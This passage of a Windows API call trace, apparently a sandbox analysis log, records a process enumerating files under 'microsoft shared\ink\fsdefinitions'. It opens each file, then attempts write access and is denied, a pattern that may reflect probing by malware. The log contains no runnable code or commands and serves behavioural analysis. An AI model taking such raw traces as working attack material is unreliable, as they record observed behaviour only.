lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml", lpUsedDefaultChar=0x0) returned 95 [0099.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0099.497] AreFileApisANSI () returned 1 [0099.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0099.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0099.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml") returned 95 [0099.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.497] GetFileType (hFile=0x27c) returned 0x1 [0099.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.497] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.498] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.498] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.498] CloseHandle (hObject=0x27c) returned 1 [0099.498] AreFileApisANSI () returned 1 [0099.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0099.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0099.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml") returned 95 [0099.498] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.498] GetLastError () returned 0x5 [0099.498] GetLastError () returned 0x5 [0099.498] SetLastError (dwErrCode=0x5) [0099.498] GetLastError () returned 0x5 [0099.498] SetLastError (dwErrCode=0x5) [0099.498] GetLastError () returned 0x5 [0099.498] SetLastError (dwErrCode=0x5) [0099.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.499] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xbc, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x4ebd0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xbc, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ˡ")) returned 0 [0099.499] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0099.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.500] AreFileApisANSI () returned 1 [0099.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml", lpUsedDefaultChar=0x0) returned 80 [0099.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.500] AreFileApisANSI () returned 1 [0099.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0099.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8c6f8, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml") returned 80 [0099.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.501] GetFileType (hFile=0x418) returned 0x1 [0099.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0099.501] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.501] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.501] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.501] CloseHandle (hObject=0x418) returned 1 [0099.501] AreFileApisANSI () returned 1 [0099.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml") returned 80 [0099.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.502] GetLastError () returned 0x5 [0099.502] GetLastError () returned 0x5 [0099.502] SetLastError (dwErrCode=0x5) [0099.502] GetLastError () returned 0x5 [0099.502] SetLastError (dwErrCode=0x5) [0099.502] GetLastError () returned 0x5 [0099.502] SetLastError (dwErrCode=0x5) [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.502] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce328, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0099.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0099.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0099.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0099.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.503] AreFileApisANSI () returned 1 [0099.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu", lpUsedDefaultChar=0x0) returned 73 [0099.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0099.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.503] AreFileApisANSI () returned 1 [0099.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0099.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 73 [0099.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.503] GetLastError () returned 0x5 [0099.503] GetLastError () returned 0x5 [0099.503] SetLastError (dwErrCode=0x5) [0099.503] GetLastError () returned 0x5 [0099.503] SetLastError (dwErrCode=0x5) [0099.503] GetLastError () returned 0x5 [0099.503] SetLastError (dwErrCode=0x5) [0099.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0099.504] AreFileApisANSI () returned 1 [0099.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0099.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 73 [0099.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.504] GetLastError () returned 0x5 [0099.504] GetLastError () returned 0x5 [0099.504] SetLastError (dwErrCode=0x5) [0099.504] GetLastError () returned 0x5 [0099.504] SetLastError (dwErrCode=0x5) [0099.504] GetLastError () returned 0x5 [0099.504] SetLastError (dwErrCode=0x5) [0099.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0099.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0099.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0099.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.504] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0099.505] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78490 [0099.505] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce328, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.505] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.505] RtlAllocateHeap 